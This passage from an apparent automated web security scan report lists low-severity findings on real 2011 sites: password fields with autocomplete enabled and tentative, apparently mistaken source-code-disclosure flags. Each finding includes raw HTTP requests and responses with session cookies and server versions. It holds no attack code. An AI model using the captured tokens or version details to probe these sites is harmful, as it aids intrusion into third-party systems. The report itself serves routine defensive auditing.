PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
</script> <form action="/ada/mn_login_fnc.cfm?securitysys=on&amp;FormID=727&amp;rand=446259" method="post" style="margin:0px;padding:0px;" name="Form0" > <div class="cfform" id="cfform" title="" style="margin:0px;padding:0px;width: 547">
...[SNIP]...
<br /> <input name="v_password" type="password" id="v_password" size="25" /> <br />
...[SNIP]...

15.49. http://www.visitflorida.com/floridalive  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.visitflorida.com
Path:   /floridalive

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /floridalive HTTP/1.1
Host: www.visitflorida.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:02:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Set-Cookie: PHPSESSID=nf9dmcfmtuh81gq8ojaulkllo7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 465042


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<div id="loginPanel">
<form action="/login/section.usermedia" method="post" onsubmit="return mypageUserLogin($('#username').val(),$('#password').val())">
<div class="username">
...[SNIP]...
</label><input type="password" class="empty" name="password" id="password" size="20" /></div>
...[SNIP]...

15.50. http://www.vsea.org/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vsea.org
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.vsea.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:12:49 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a33741c30c60faca76c77b41e704af54; expires=Mon, 23 May 2011 01:46:09 GMT; path=/; domain=.vsea.org
Last-Modified: Fri, 29 Apr 2011 22:12:49 GMT
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 45383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Ver
...[SNIP]...
<div class="content">
<form action="/node?destination=node" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

15.51. http://www.vsea.org/editorial-lays-out-vermont%26%23039  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vsea.org
Path:   /editorial-lays-out-vermont%26%23039

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /editorial-lays-out-vermont%26%23039 HTTP/1.1
Host: www.vsea.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a1ac331b9fc4cf4b88d8cdd9f726382e;

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 12:41:34 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 30 Apr 2011 12:41:34 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Pag
...[SNIP]...
<div class="content">
<form action="/?destination=editorial-lays-out-vermont" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

15.52. http://www.vsea.org/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vsea.org
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /favicon.ico HTTP/1.1
Host: www.vsea.org
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a1ac331b9fc4cf4b88d8cdd9f726382e

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 01:22:40 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 30 Apr 2011 01:22:40 GMT
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 31785

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Pag
...[SNIP]...
<div class="content">
<form action="/?destination=favicon.ico" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

15.53. http://www.vsea.org/join-vsea  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vsea.org
Path:   /join-vsea

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /join-vsea HTTP/1.1
Host: www.vsea.org
Proxy-Connection: keep-alive
Referer: http://www.vsea.org/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a1ac331b9fc4cf4b88d8cdd9f726382e

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:13:10 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 29 Apr 2011 22:13:11 GMT
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 34231

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Joi
...[SNIP]...
<div class="content">
<form action="/join-vsea?destination=node%2F216" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

15.54. http://www.vsea.org/join-your-union  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vsea.org
Path:   /join-your-union

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /join-your-union HTTP/1.1
Host: www.vsea.org
Proxy-Connection: keep-alive
Referer: http://www.vsea.org/join-vsea
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a1ac331b9fc4cf4b88d8cdd9f726382e

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:13:24 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 29 Apr 2011 22:13:24 GMT
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 39482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Joi
...[SNIP]...
<div class="content">
<form action="/join-your-union?destination=node%2F220" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

15.55. http://www.vsea.org/maine-study-finds-state%26%23039  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vsea.org
Path:   /maine-study-finds-state%26%23039

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /maine-study-finds-state%26%23039 HTTP/1.1
Host: www.vsea.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a1ac331b9fc4cf4b88d8cdd9f726382e;

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 12:41:34 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 30 Apr 2011 12:41:34 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Pag
...[SNIP]...
<div class="content">
<form action="/?destination=maine-study-finds-state" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

15.56. http://www.vsea.org/node  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vsea.org
Path:   /node

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /node HTTP/1.1
Host: www.vsea.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a1ac331b9fc4cf4b88d8cdd9f726382e;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:41:34 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 30 Apr 2011 12:41:34 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Ver
...[SNIP]...
<div class="content">
<form action="/node?destination=node" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

15.57. http://www.vsea.org/purchase-vsea-clothing  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vsea.org
Path:   /purchase-vsea-clothing

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /purchase-vsea-clothing HTTP/1.1
Host: www.vsea.org
Proxy-Connection: keep-alive
Referer: http://www.vsea.org/join-your-union
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a1ac331b9fc4cf4b88d8cdd9f726382e

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:13:49 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 29 Apr 2011 22:13:49 GMT
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 32798

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Pur
...[SNIP]...
<div class="content">
<form action="/purchase-vsea-clothing?destination=node%2F723" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

15.58. http://www.vsea.org/state-hospital%26%23039  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vsea.org
Path:   /state-hospital%26%23039

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /state-hospital%26%23039 HTTP/1.1
Host: www.vsea.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSc2e79101469fa43c6bcc78e0ec8b2f81=a1ac331b9fc4cf4b88d8cdd9f726382e;

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 12:41:40 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 mod_fcgid/2.3.5 mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 30 Apr 2011 12:41:40 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

   <head>
   <title>Pag
...[SNIP]...
<div class="content">
<form action="/?destination=state-hospital" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

16. Source code disclosure  previous  next
There are 24 instances of this issue:


16.1. http://data.ok.gov/packages/base.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://data.ok.gov
Path:   /packages/base.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /packages/base.js?1304035488 HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:21:27 GMT
Server: Apache
Last-Modified: Fri, 29 Apr 2011 00:04:48 GMT
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Sat, 07 May 2011 11:21:27 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/javascript
Content-Length: 370605

Date.CultureInfo={name:"en-US",englishName:"English (United States)",nativeName:"English (United States)",dayNames:["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],abbreviatedD
...[SNIP]...
<J;G++){I.call(H,G)}};E.mixin=function(G){d(E.functions(G),function(H){s(H,E[H]=G[H])})};var l=0;E.uniqueId=function(G){var H=l++;return G?G+H:H};E.templateSettings={evaluate:/<%([\s\S]+?)%>/g,interpolate:/<%=([\s\S]+?)%>/g};E.template=function(J,I){var K=E.templateSettings;var G="var __p=[],print=function(){__p.push.apply(__p,arguments);};with(obj||{}){__p.push('"+J.replace(/\\/g,"\\\\").replace(/'/g,"\\'").replace(K.
...[SNIP]...

16.2. http://data.ok.gov/packages/shared-map.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://data.ok.gov
Path:   /packages/shared-map.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /packages/shared-map.js?1304158436 HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=120904477.1304162509.1.1.utmcsr=ok.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27; __utma=120904477.1835992193.1304162509.1304162509.1304162509.1; __utmc=120904477; __utmb=120904477.2.10.1304162509; socrata-csrf-token=iR%2BNktWzrQ%2FEwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk%3D

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:22:50 GMT
Server: Apache
Last-Modified: Fri, 29 Apr 2011 00:04:52 GMT
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Sat, 07 May 2011 11:22:50 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/javascript
Content-Length: 74759

function MarkerClusterer(e,a,d){this.extend(MarkerClusterer,google.maps.OverlayView);this.map_=e;this.markers_=[];this.clusters_=[];this.sizes=[53,56,66,78,90];this.styles_=[];this.ready_=false;var b=
...[SNIP]...
utes[m.displayFieldName]).show(h.screenPoint,g.map.getInfoWindowAnchor(h.screenPoint))};var e=function(h,j,l){var g=function(){var o=h.query.filterCondition;if(_.isEmpty(o)){return"1=1"}var n={EQUALS:"<%= field %> = <%= val1 %>",NOT_EQUALS:"<%= field %> != <%= val1 %>",STARTS_WITH:"<%= field %> LIKE '<%= val1 %>%'",CONTAINS:"<%= field %> LIKE '%<%= val1 %>%'",NOT_CONTAINS:"<%= field %> NOT LIKE '%<%= val1 %>%'",IS_NOT_BLANK:"<%= field %> IS NOT NULL",IS_BLANK:"<%= field %> IS NULL",LESS_THAN:"<%= field %> < <%= val1 %>",LESS_THAN_OR_EQUALS:"<%= field %> <= <%= val1 %>",GREATER_THAN:"<%= field %> > <%= val1 %>",GREATER_THAN_OR_EQUALS:"<%= field %> >= <%= val1 %>",BETWEEN:"<%= field %> BETWEEN <%= val1 %> AND <%= val2 %>"};var m=function(q){var t=p(q.children[0]);var s=_.detect(j.featureLayers[0].fields,function(u){return u.name==t});var r=[];r.push(p(q.children[1]));r.push(p(q.children[2]));r=_.compact(r);if(_.includ
...[SNIP]...

16.3. http://data.ok.gov/packages/shared-table-editor.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://data.ok.gov
Path:   /packages/shared-table-editor.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /packages/shared-table-editor.js?1304035492 HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=120904477.1304162509.1.1.utmcsr=ok.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120904477.1835992193.1304162509.1304162509.1304162509.1; __utmc=120904477; __utmb=120904477.1.10.1304162509; socrata-csrf-token=iR%2BNktWzrQ%2FEwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk%3D; _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:22:49 GMT
Server: Apache
Last-Modified: Fri, 29 Apr 2011 00:04:52 GMT
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Sat, 07 May 2011 11:22:49 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/javascript
Content-Length: 241599

var blistUtilNS=blist.namespace.fetch("blist.util");blistUtilNS.toHumaneNumber=function(g,b){var f=["K","M","B","T"];var e=1000;var d=Math.pow(e,f.length);var h=Math.abs(g);var a;g=parseFloat(g);for(v
...[SNIP]...
<span><%=prev%></span>
...[SNIP]...
<span><%=next%></span>
...[SNIP]...
<span><%=day1%></span></th>","<th><span><%=day2%></span></th>","<th><span><%=day3%></span></th>","<th><span><%=day4%></span></th>","<th><span><%=day5%></span></th>","<th><span><%=day6%></span></th>","<th><span><%=day7%></span>
...[SNIP]...
<td class="<%=weeks[0].days[0].classname%>"><a href="#"><span><%=weeks[0].days[0].text%></span></a></td>','<td class="<%=weeks[0].days[1].classname%>"><a href="#"><span><%=weeks[0].days[1].text%></span></a></td>','<td class="<%=weeks[0].days[2].classname%>"><a href="#"><span><%=weeks[0].days[2].text%></span></a></td>','<td class="<%=weeks[0].days[3].classname%>"><a href="#"><span><%=weeks[0].days[3].text%></span></a></td>','<td class="<%=weeks[0].days[4].classname%>"><a href="#"><span><%=weeks[0].days[4].text%></span></a></td>','<td class="<%=weeks[0].days[5].classname%>"><a href="#"><span><%=weeks[0].days[5].text%></span></a></td>','<td class="<%=weeks[0].days[6].classname%>"><a href="#"><span><%=weeks[0].days[6].text%></span>
...[SNIP]...
<td class="<%=weeks[1].days[0].classname%>"><a href="#"><span><%=weeks[1].days[0].text%></span></a></td>','<td class="<%=weeks[1].days[1].classname%>"><a href="#"><span><%=weeks[1].days[1].text%></span></a></td>','<td class="<%=weeks[1].days[2].classname%>"><a href="#"><span><%=weeks[1].days[2].text%></span></a></td>','<td class="<%=weeks[1].days[3].classname%>"><a href="#"><span><%=weeks[1].days[3].text%></span></a></td>','<td class="<%=weeks[1].days[4].classname%>"><a href="#"><span><%=weeks[1].days[4].text%></span></a></td>','<td class="<%=weeks[1].days[5].classname%>"><a href="#"><span><%=weeks[1].days[5].text%></span></a></td>','<td class="<%=weeks[1].days[6].classname%>"><a href="#"><span><%=weeks[1].days[6].text%></span>
...[SNIP]...
